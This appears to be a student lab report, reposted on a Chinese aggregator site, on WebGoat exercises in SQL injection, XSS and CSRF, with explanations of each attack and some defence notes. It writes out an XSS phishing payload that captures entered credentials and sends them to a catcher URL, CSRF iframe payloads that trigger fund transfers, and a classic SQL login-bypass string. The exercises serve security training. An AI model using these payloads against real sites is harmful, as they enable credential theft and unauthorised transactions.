其他分享
首页 > 其他分享> > 20165306 Exp9 Web安全基础

20165306 Exp9 Web安全基础

作者:互联网

Exp9 Web安全基础

一、实验概述

0.WebGoat准备工作

(一)SQL注入攻击

(二)XSS攻击

(三)CSRF攻击

二、实验内容

0.WebGoat准备工作

(一)SQL注入攻击

1.命令注入(Command Injection)

2.数字型SQL注入(Numeric SQL Injection)

3.日志欺骗(Log Spoofing)

4.字符串型注入(String SQL Injection)

5.LAB: SQL Injection

6.数据库后门(Database Backdoors)

7.数字型盲注入(Blind Numeric SQL Injection)

8.字符串型盲注入(Blind String SQL Injection)

(二)XSS攻击

1.Phishing with XSS

<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br> 
</form><br><br><HR>

<script>
function hack()
{ 
    alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
    XSSImage=new Image; 
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>
<script>
function hack()
{ 
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
  XSSImage=new Image; 
  XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
} 
</script>

<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>

2.Stored XSS Attacks

3.Reflected XSS Attacks

(三)CSRF攻击

1.Cross Site Request Forgery(CSRF)

2.CSRF Prompt By-Pass

  <iframe src="attack?Screen=325&menu=900&transferFunds=5306"> </iframe>
  <iframe src="attack?Screen=325&menu=900&transferFunds=CONFIRM"> </iframe>


三、回答问题

(1)SQL注入攻击原理,如何防御

所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

sql注入攻击是利用是指利用设计上的漏洞,在目标服务器上运行Sql语句以及进行其他方式的攻击,动态生成Sql语句时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。

比如登录过程,SQL语句一般为select id from users where username = '"+username +"' and password = '" + password +"',这里的usernamepassword都是我们存取从web表单获得的数据。如果我们在表单中username的输入框中输入' or 1=1--,此时我们所要执行的sql语句就变成了select id from users where username = '' or 1=1-- and password = ''。因为1=1是true,后面 and password = ''被注释掉了,所以这里完全跳过了sql验证。

以上是最经典的一种情况。但在本次实验中,还涉及到了网页对输入字符长度的限制等等,需要修改相应的代码。

由此可见,对SQL注入攻击的防御,主要有:

(2)XSS攻击的原理,如何防御

攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。

(3)CSRF攻击原理,如何防御

CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。

严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。

防御的方法可从以下几个角度考虑:

标签:XSS,Exp9,Web,20165306,点击,CSRF,SQL,Injection,输入
来源: https://www.cnblogs.com/5306xyh/p/10925646.html